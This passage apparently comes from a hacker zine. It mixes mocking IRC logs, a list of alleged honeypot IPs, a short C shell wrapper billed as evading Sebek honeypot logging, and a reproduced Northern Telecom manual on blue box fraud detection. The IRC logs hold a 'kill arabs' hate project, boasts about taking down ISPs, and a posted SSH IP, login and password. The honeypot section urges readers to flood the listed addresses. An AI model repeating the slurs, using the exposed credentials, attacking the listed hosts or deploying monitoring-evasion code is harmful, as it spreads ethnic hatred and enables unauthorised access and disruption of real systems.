[26 Aug/03:12am] (pr0ix) you can feel lucky, belive me he's able to take out your whole ISP's backbone..
[26 Aug/03:12am] (pr0ix) yeah why not, i could kill your isp

[26 Aug/03:07am] (pr0ix) you are a clueless fag
[26 Aug/03:07am] (pr0ix) you keep fucking with my friends
[26 Aug/03:07am] <ech0> how so ?
[26 Aug/03:07am] (pr0ix) i dont want you in #darknet so fuck off

/*************************************************/

pr0ix starts his own pr0j3ct m4yh3m

[31 Aug/11:46am] (pr0ix) yeah, heh i started a new project, "no justice - no peace - kill arabs"
[31 Aug/11:50am] (pr0ix) soon i will be able to toggle the internet in every arab country, sounds strange and gay but its true
[31 Aug/11:53am] <ofer> I hope so :)
[31 Aug/11:57am] (pr0ix) no shit, it will even affect the big oil companies

/*************************************************/

ROFL

[7 Aug/09:02am] <illumz> who knows maybe u did get haxed
[7 Aug/09:03am] (pr0ix) haha never

/*************************************************/

At least pr0ix laughs at his own lameness

[8 Sep/08:22am] <[RaFa]> many people told me your skilled
[8 Sep/08:22am] (pr0ix) *lol*

/*************************************************/

I wonder what goodies are on dvdmans home box?

[22 Aug/02:25am] <dvdman> ssh 208.59.134.110
[22 Aug/02:25am] <dvdman> login = pr0ix
[22 Aug/02:25am] <dvdman> pw = temp

/*************************************************/




|=[ 0x0b ]=--------------------------------------------------------------=|

Project Honeynet Enumeration
by anonymous Phrack High Council Member

Well we all know about the HoneyNet project. (www.honeynet.org for l4merz) 
They catch hackers by luring you in with the appearance of exploitability,
record all your traffic with Snort and Sebek (their vlogger ripoff), then
steal all your 0day, and abuse it for creepy whitehat purposes. Like, say,
publishing the code on bugtraq. Or having Lance pretend to understand it.
Or put it in the hands of any other narc/spook in the business of selling
out their souls.

Do not despair kiddies! The tables are turning. PHC Enterprises , LTD, a
subsidiary of Phrack Magazine Corp., has developed a highly efficient,
multithreaded, self-replicating, highly agressive packet scanner capable
of identifying honeypots in the wild.

Enter HONEYSCAN.C!!@@#$%^
HONEYSCAN: "Stickier than rloxely's keyboarD!"
HONEYSCAN: "More tricks than a vegas hooker!"
HONEYSCAN: "Smokes the crack!"

The advanced crack-smoking techniques used in this scanner will not be
disclosed at the present time, at the request of PHC Labs/ Research division.
Testing  is ongoing. However, if honeypots or honeynets are ever deployed...
AHEM, uhh anywhere at all really, you can rest assured that PHC Enterprises
will altert YOU, the PHRACK consumer, of the presence of honeypots on the
Internet.  As a token of our gratidude for your  continued patronage of the
true underground scene, we would like to present a list of honeypots, for
recreational packeting purposes.

 
DRUMROLL< PLEASE

RECREATIONALLY PACKET THESE BOXES!@#$%
RLOXLEY THIS MEANS YOU.

141.211.133.240
141.211.133.241
141.211.133.242
141.211.133.243




|=[ 0x0c ]=--------------------------------------------------------------=|

Sebek Sucks
by Chris Spencer


/*
 * Copyright (C) 2002, 2003 ISS Inc.
 *     All Rights Reserved.
 *
 * THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF ISS
 * The copyright notice above does not evidence any
 * actual or intended publication of such source code.
 *
 * This code can be very dangerous if put in the wrong hands.
 * Do not distribute.
 *
 * This piece of warez lets you go unlogged on sebek-enabled honeypots.
 *
 */

#include <stdio.h>
#include <string.h>

int main (int argc, char **argv)
{
	int l;
	char *p, buf[1024];

	while (fgets (buf, sizeof (buf) - 1, stdin)) {
		l = strcspn (buf, "\r\n");
		buf[l] = '\0';

		if (!strcmp (buf, "exit") || !strcmp (buf, "logout")) {
			exit (0);
		}
		else if (!strncmp (buf, "cd", 2)) {
			p = strrchr (buf, ' ');
			if (!p)
				continue;
			chdir (p + 1);
		}
		else {
			system (buf);
		}
	}
}




|=[ 0x0d ]=--------------------------------------------------------------=|

Bluebox Infoz
by tr4shc4n m4n


Yo yo- 
|=----------------------------------------------------------------------=|
How many times have you been hanging around on IRC when some moron goes
off about BlueBoxing, and the threat it poses.
(See #2600/#hackphreak/#cdc/#pla <- theze guys are the worst. ) Well for
this issue we decided to dump something found in the trash a few years
ago by one of our S3kr3t 4g3ntz. Thanks to this document the textfile 
knowledge of a generation of overwieght wannabe vampire hackers
( yo werd 2 the DoC ) will be eradicated.
Yo propz to liveevil - 
where you @ bro!@#!@#!@#!@#!@#. 


PS. SOMEONE PLZ GIVE US A FUCKING SCANNER THIS SHIT IS HARD AS FUCK TO
RETYPE!!



Contents
Introduction 1-1
Description 2-1
Testing for fraudulent calls 2-3
Recording fraudulent calls 2-5
Disposing of fraudulent calls 2-5
Cut the call 2-5
Continue the call 2-5
Operational measurements 3-1
User interface 4-1
Commands 4-1
Alarms 4-4
Logs 4-4
List of terms 5-1
List of figures
Figure 2-1 Fraudulent call setup 2-1
Figure 2-2 Fraudulent call system response 2-2
Figure 2-3 Reserved multifrequency receiver 2-3
List of tables
Table 2-1 MFR attachment response 2-4
Table 3-1 Blue box fields 3-1
Table 4-1 Log description 4-5

Blue Box Fraud Detection Feature Description BCS22 and up
1-1
Introduction
This document describes the Blue Box Fraud Detection feature and its
operation within the DMS-100 Family. A .blue box. is any device, connected
illegally to a subscriber.s line, that can produce both a 2600 Hz tone and
multifrequency (MF) digits.
To place a fraudulent call, the perpetrator performs two steps:
1 The perpetrator uses a normal telephone to place a normal call. This call
is usually a free or inexpensive call, and uses a Single Frequency (SF)
trunk beyond the perpetrator.s billing office.
2 The perpetrator uses a blue box to place the fraudulent call. This call
uses the SF trunk seized for the original, normal call.
The perpetrator.s billing office typically does not detect calls placed with a
.blue box., thus the term .blue box fraud..
The Blue Box Fraud Detection feature discovers fraudulent MF signaling
over Centralized Automatic Message Accounting (CAMA) and SuperCAMA
trunks. It does not detect fraudulent signaling over Traffic Operator Position
System (TOPS) trunks. The Blue Box Fraud Detection feature can
alert the operating company of a fraudulent call attempt and either allow
billing to be made for the call or disconnect the call.
This feature detects fraudulent MF signaling but does not detect fraudulent
SF pulsing. No customer data schema is required, because the feature is
activated and deactivated using the Command Interpreter (CI) facilities
at the Maintenance and Administration Position (MAP). The feature
implements the method of detection of fraudulent telephone calls described
in U.S. patent 4,001,513.

Blue Box Fraud Detection Feature Description BCS22 and up
2-1
Description
The Blue Box Fraud Detection feature allows the DMS-200 to perform
three fraud detection functions:
 test for fraudulent calls
 record fraudulent calls
 dispose of fraudulent calls (cut or continue).
Those events are described in the remainder of this chapter
Figure 2-1 describes how a perpetrator initiates a fraudulent call.
Figure 2-1
Fraudulent call setup
To place a fraudulent call, the perpetrator
first places a normal call.
The End Office sends the digits to the
CAMA office.
The CAMA office receives and translates
the digits from the End Office,
and seizes an outgoing trunk.
The Office at the far end of the outgoing
trunk winks in response, and the
CAMA office sends the called digits
for this normal call.
No fraud has taken place yet.
END
OFFICE
CAMA
OFFICE
DMS
200
0
0
CAMA
TRUNK
OUTGOING
TRUNK WINK
2-2 Description
297-1001-132 Standard 02.02 March 1991
Figure 2-2 describes how the system responds to a fraudulent call, and how
the testing procedure is invoked.
Figure 2-2xxx
Fraudulent call system response
To place a fraudulent call, the perpetrator
first places a normal call.
The End Office sends the digits to the
CAMA office.
The CAMA office receives and translates
the digits from the End Office,
and seizes an outgoing trunk.
The Office at the far end of the outgoing
trunk winks in response, and the
CAMA office sends the called digits
for this normal call.
No fraud has taken place yet.
END
OFFICE
CAMA
OFFICE
DMS
200
0
0
CAMA
TRUNK
OUTGOING
TRUNK WINK
BLUE
BOX
Description 2-3
Blue Box Fraud Detection Feature Description BCS22 and up
Testing for fraudulent calls
Triggered by the unexpected wink, the DMS-200 begins to test the suspected
fraudulant call. Figure 2-3 describes how the DMS-200 prepares to
test for fraudulent calls.
Figure 2-3xxx
Reserved multifrequency receiver
END
OFFICE
CAMA
OFFICE
DMS
200
0
0
CAMA
TRUNK
OUTGOING
TRUNK WINK
BLUE
BOX
reserved
MFR
broadcast
connection
To test the call, the DMS-200 establishes
a broadcast network connection
from the suspected incoming
CAMA trunk to a reserved MF receiver
(MFR).
These MFR are reserved when the
feature is activated.
As long as the feature is active, the
reserved MFR are not available for
standard call processing.
NOTE: The number of MFR set in reserve
depends on the number of simultaneous
fraud attempts expected.
For providing MFR refer to Provisioning,
297-1001-450.
Following is a description of the
events that occur after the MFR is attached.
2-4 Description
297-1001-132 Standard 02.02 March 1991
Table 2-1 describes the events that occur after the MFR is attached. After
attaching the MFR, the DMS-200 waits for one of the events shown in the
.Event. column of Table 2-1 and responds to that event as shown in the
.System response. column of the same table. Table 2-1 also includes an
.Explanation. coulmn to clarify circumstances and conditions surrounding
the event being described.
Table 2-1xxx
MFR attachment response
Event Explanation System response
Wink Wink on the same
trunk again.
Reset the MFR timeout and continue
to wait.
Digits A fraudulent set of
called digits has
been received.
Provide the charge utility with these
digits and use the Automatic Message
Accounting (AMA) Event Information
Digit to flag this call as a Blue
Box call. Release the MFR.
If the CUT option was specified from
the MAP, disconnect the call.
Refer to Commands on page 4-1
for information about the CUT option.
Call Failure Mutilated digit(s) detected
by the MFR.
Several things could
cause this:
 the call may
have released
 there may be a
real transmission
problem
 the perpetrator
may be using SF
pulsing
Release the MFR and assume no
fraud has taken place.
MFR Timeout This time allowed
to detect possible
fraudulent MF digits
has expired.
Release the MFR and assume no
fraud has taken place.
Page 1 of 1
Description 2-5
Blue Box Fraud Detection Feature Description BCS22 and up
Recording fraudulent calls
The DMS-200 performs the following actions after detecting a fraudulent
call:
 If the CUT option was not specified, replace the original digits in the
charge buffer with the fraudulent digits.
Note: If the perpetrator places more than one fraudulent call, only the
last call appears in the charge buffer.
 Set the AMA event information digit to mark the call as a blue box call.
See document Automatic Message Accounting - Northern Telecom Format,
297-1001-119.
 If the office is performing AMA recording for this call, generate a
log to alert the operating company office that a Blue Box call is in
progress.
 See if the ALARM option was specified at the MAP, generate a visual/
audible minor alarm.
Disposing of fraudulent calls
There are two options for disposing of fraudulent calls: Cut the call or
continue the call.
Cut the call
To cut a fraudulent call, the DMS-200 performs the following actions:
 releases the MFR
 releases the connection between the originating and terminating agents
of the call
 processes the AMA information
 deallocates the terminator
 sets treatment for the originator.
Continue the call
If the CUT option was not specified, the DMS-200 releases the MFR and
the call continues. The perpetrator is billed based on the fraudulent
digits. When the subscriber disconnects the call, the system generates a
log and turns off the alarm if the ALARM option was specified.

Blue Box Fraud Detection Feature Description BCS22 and up
3-1
Operational measurements
The Operational Measurement BLUEBOX is associated with the Blue Box
Fraud Detection feature (see Operational Measurements (OM),
297-1001-814, for more information). The CI command OMSHOW
BLUEBOX will display the contents of each field.
BLUEBOX has the following fields:
Table 3-1xxx
Blue box fields
Field Description
BBWinks Number of unexpected winks detected on incoming CAMA
trunks. These winks could indicate fraudulent calls.
BBAttach Number of successful MFR attachments to suspected trunks.
BBDetect Number of fraudulent calls detected.
Page 1 of 1

Blue Box Fraud Detection Feature Description BCS22 and up
4-1
User interface
The Blue Box Fraud Detection feature is activated by a CI command issued
at the MAP. The same command can be used to query the status of the feature.
The following section describes the syntax and options of the commands.
Commands
BLUEBOX ACT
CLR
nmfr timeout ALARM
CUT
activates, clears, or queries the status of the Blue Box Fraud Detection
feature.
Activating the feature reserves the specified number of MFR. Clearing
the feature returns the MFR to the common pool.
Where:
ACT activates the blue box feature and reserves the specified number
of MFR.
CLR deactivates the blue box feature and returns the MFR to the common
pool.
nmfr specifies the number of MFR to be reserved.
 Range: 1 through 3.
 Default: 1.
timeout specifies the number of seconds the MFR will wait for digits.
 Range: 5 through 35.
 Default: 30.
4-2 User interface
297-1001-132 Standard 02.02 March 1991
ALARM specifies that an audible/visual alarm will be generated when a
Blue Box call is detected.
CUT specifies that fraudulent calls will be disconnected. If this
parameter is not specified, the fraudulent call will continue.
Note: 1 The activation parameters are position-dependent. That is,
nmfr must be specified before timeout; both nmfr and timeout must be
specified before ALARM or CUT.
Note: 2 The BLUEBOX command issued without any parameters queries
the system for the feature status.
Examples:
1 Activate the blue box feature using only the default parameters. The
user enters the following CI command:
BLUEBOX ACT
The system responds with the feature status and parameters:
Bluebox Fraud Detection Feature Status:
Active.
1 MFR reserved, timeout set to 30 seconds.
2 Activate the blue box feature and reserve two MFR. The user inputs the
following CI command:
BLUEBOX ACT 2
The system responds with the feature status and parameters:
Bluebox Fraud Detection Feature Status:
Active.
2 MFR reserved, timeout set to 30 seconds.
3 Activate the blue box feature and reserve three MFR with a timeout of
22 seconds. The user inputs the following CI command:
BLUEBOX ACT 3 22
The system responds with the feature status and parameters:
Bluebox Fraud Detection Feature Status:
Active.
3 MFR reserved, timeout set to 22 seconds.
User interface 4-3
Blue Box Fraud Detection Feature Description BCS22 and up
4 Activate the blue box feature with the ALARM option. Reserve one
MFR with a timeout of 30 seconds. The user inputs the following CI
command:
BLUEBOX ACT 1 30 ALARM
The system responds with the feature status and parameters:
Blue Box Feature Status:
Active.
1 MFR reserved, timeout set to 30 seconds.
Detection will report alarm.
5 Activate the blue box feature with the CUT option. Reserve two MFR
with a timeout of 25 seconds. The user inputs the following CI command:
BLUEBOX ACT 2 25 CUT
The system responds with the feature status and parameters:
Bluebox Fraud Detection Feature Status:
Active.
2 MFR reserved, timeout set to 25 seconds.
Detection will cut off call.
6 Determine the status of the blue box feature. The user inputs the
following CI command:
BLUEBOX
If the feature is not active, the system responds with:
Bluebox Fraud Detection Feature Status:
Inactive.
If the feature is active, the system responds with the feature status and
parameters:
Bluebox Fraud Detection Feature Status:
Active.
2 MFR Reserved, timeout set to 35 seconds.
Detection will cut off call.
7 Deactivate the blue box feature and return the MFR to the common pool.
The user inputs the following CI command:
BLUEBOX CLR
The system indicates command execution with the response:
4-4 User interface
297-1001-132 Standard 02.02 March 1991
Bluebox Detection Feature Cleared.
Q BLUEBOX
queries the system for the syntax of the BLUEBOX command.
Example:
Display the BLUEBOX command syntax.
The user inputs the following CI command:
Q BLUEBOX
The system responds with the following syntax diagram:
Parameters for Bluebox Fraud Detection
Parms: [<Active Status> {CLR,
ACT [<Number of MFRs> {1 TO 3}]
[<Timeout Value> {5 TO 35}]
[<Notification Option> {ALARM,
CUT}]}]
Alarms
If the ALARM option is specified, a minor office alarm is activated
whenever a blue box call is detected. The office alarm is deactivated
at call disconnect.
Logs
The following six logs are associated with the Blue Box Fraud Detection
feature:
 AUDT118
 EXT106
 TRK151
 TRK152
 TRK153
 TRK154.
The following is a brief description and example of each log. See Log Report
Manual, 297-1001-510, for more detailed information.
User interface 4-5
Blue Box Fraud Detection Feature Description BCS22 and up
Table 4-1xxx
Log description
Log Description
AUDT118 The Audit subsystem generates this log when Blue Box Fraud
Detection feature data is inconsistent with the corresponding MFR
data. The identified MFR cannot be used for fraud detection until
the problem is cleared.
Example:
AUDT118 APR12 12:00:00 2112 FAIL BLUEBOX MFR LOST
CKT RCVRMF 1
EXT106 The External Alarms subsystem generates this log when a fraudulent
call is detected and when that call disconnects.
Example:
*EXT106 MAR14 12:00:00 2112 INFO BLUEBOX ON
CALL DETECTED
TRK151 The Trunk Maintenance subsystem generates this log when the
Bluebox Fraud Detection feature is activated.
Example:
TRK151 APR11 12:00:00 2112 INFO BLUEBOX DETECTION
ACTIVE
# OF MFRS = 2 ALARM ENABLED
CKT RCVRMF 0 CKT RCVRMF 1 CKT RCVRMF 2
TRK152 The Trunk Maintenance subsystem generates this log when the
Bluebox Fraud Detection feature is deactivated.
Example:
TRK152 APR04 12:00:00 2112 INFO BLUEBOX DETECTION
CLEARED
Page 1 of 2
4-6 User interface
297-1001-132 Standard 02.02 March 1991
Table 4-1xxx
Log description (continued)
Log Description
TRK153 The Trunk Maintenance subsystem generates this log when the
Bluebox Fraud Detection feature is active and a fraudulent call is
detected.
Example:
TRK153 APR16 12:00:00 2112 INFO BLUEBOX CALL DETECTED
IC TRUNK = CKT RTP2W 1 CALLING # = 9197811199
OG TRUNK = CKT CARY2W 2 CALLED # = 61247418888
CALLED # REPLACED BY 3152651234
CALLID = 123456
TRK154 The Trunk Maintenance subsystem generates this log when the
Bluebox Fraud Detection feature is active and a fraudulent call is
disconnected.
Example:
TRK154 APR11 12:00:00 2112 INFO BLUEBOX CALL DISCONNECT
CKT APEX2W 1
CALLING # = 6133628669 2 CALLED # = 6124741888
CALLID = 123456
Page 2 of 2
Blue Box Fraud Detection Feature Description BCS22 and up
5-1
List of terms
AMA
Automatic Message Accounting
Automatic Message Accounting
An automatic recording system that documents all the necessary billing data
of subscriber-dialed long distance calls.
Batch Change Supplement
A DMS-100 Family software release.
BCS
Batch Change Supplement
CAMA
Centralized Automatic Message Accounting
A system that produces itemized billing details for subscriber-dialed long
distance calls. Details are recorded at a central facility serving a number
of exchanges. In exchanges not equipped for automatic number identification,
calls are routed to a CAMA operator who obtains the calling number and
keys it into the computer for billing.
CI
Command Interpreter
Command Interpreter
A Support Operating System component that functions as the main interface
between machine and user. Its principal roles are:
1 To read lines entered by a terminal user.
2 To break each line into recognizable units.
3 To analyze the units.
4 To recognize command item-numbers on the input lines.
5 To invoke these commands.
5-2 List of terms
297-1001-132 Standard 02.02 March 1991
Maintenance and Administration Position
A group of components that provide a man-machine interface between operating
company personnel and the DMS-100 Family systems. A MAP consists
of a Visual Display Unit and keyboard, a voice communications
Module, test facilities, and MAP furniture. MAP is a trademark of Northern
Telecom.
MAP
Maintenance and Administration Position
MF
Multifrequency
MFR
Multifrequency Receiver
Multifrequency
A method that makes use of pairs of standard tones to transmit signaling
codes, digit pulsing, and coin-control signals.
Northern Telecom Practice
A document that contains descriptive information about the DMS-100 Family
hardware and software Modules, and Performance Oriented Practices for
testing and maintaining the system. NTP.s are supplied as part of the
standard documentation package provided to an operating company.
NTP
Northern Telecom Practice
PEC
Product Engineering Code
Product Engineering Code
An eight character code that provides a unique identification for each
marketable product manufactured by Northern Telecom.
SF
Single Frequency
Single Frequency
A signaling method using a 2600 Hz tone to transmit and receive on-/offhook
address and supervisory signals. SF is used in conjunction with E and
M signaling on four-wire trunk facilities.
List of terms 5-3
Blue Box Fraud Detection Feature Description BCS22 and up
TOPS
Traffic Operator Position System
Traffic Operator Position System
A toll operator.s position consisting of a video display and keyboard for
monitoring call details and entering routing and billing information. TOPS
is a trademark of Northern Telecom.




|=[ EOF ]=---------------------------------------------------------------=|